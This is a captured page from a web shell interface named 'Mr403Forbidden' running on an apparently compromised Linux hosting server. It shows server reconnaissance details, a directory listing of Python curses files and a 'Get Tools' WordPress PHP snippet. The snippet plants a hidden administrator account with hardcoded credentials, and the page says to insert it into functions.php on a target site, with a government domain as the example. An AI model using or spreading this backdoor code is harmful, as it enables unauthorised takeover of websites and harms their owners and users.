./Mr403Forbidden

:/usr/lib64/python2.7/curses/ [ s--------- ]

System: Linux myhosting.zubahost.com 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
Software: LiteSpeed
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 194.163.174.55
Your IP: 216.73.216.138
User: business1 (1088) | Group: business1 (1091)
Safe Mode: OFF
MYSQL: OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: ON | PKEXEC: OFF
Disable Function:
mail

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = 'mr403forbidden@hotmail.com';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
__init__.py file 2024-04-10 4:58 1.77 KB root/root s---------
__init__.pyc file 2024-04-10 4:58 1.52 KB root/root s---------
__init__.pyo file 2024-04-10 4:58 1.52 KB root/root s---------
ascii.py file 2024-04-10 4:58 2.49 KB root/root s---------
ascii.pyc file 2024-04-10 4:58 5.01 KB root/root s---------
ascii.pyo file 2024-04-10 4:58 5.01 KB root/root s---------
has_key.py file 2024-04-10 4:58 5.5 KB root/root s---------
has_key.pyc file 2024-04-10 4:58 5.8 KB root/root s---------
has_key.pyo file 2024-04-10 4:58 5.8 KB root/root s---------
panel.py file 2024-04-10 4:58 110 B root/root s---------
panel.pyc file 2024-04-10 4:58 277 B root/root s---------
panel.pyo file 2024-04-10 4:58 277 B root/root s---------
textpad.py file 2024-04-10 4:58 7.48 KB root/root s---------
textpad.pyc file 2024-04-10 4:58 6.98 KB root/root s---------
textpad.pyo file 2024-04-10 4:58 6.98 KB root/root s---------
wrapper.py file 2024-04-10 4:58 1.64 KB root/root s---------
wrapper.pyc file 2024-04-10 4:58 1.19 KB root/root s---------
wrapper.pyo file 2024-04-10 4:58 1.19 KB root/root s---------

© ./Mr403Forbidden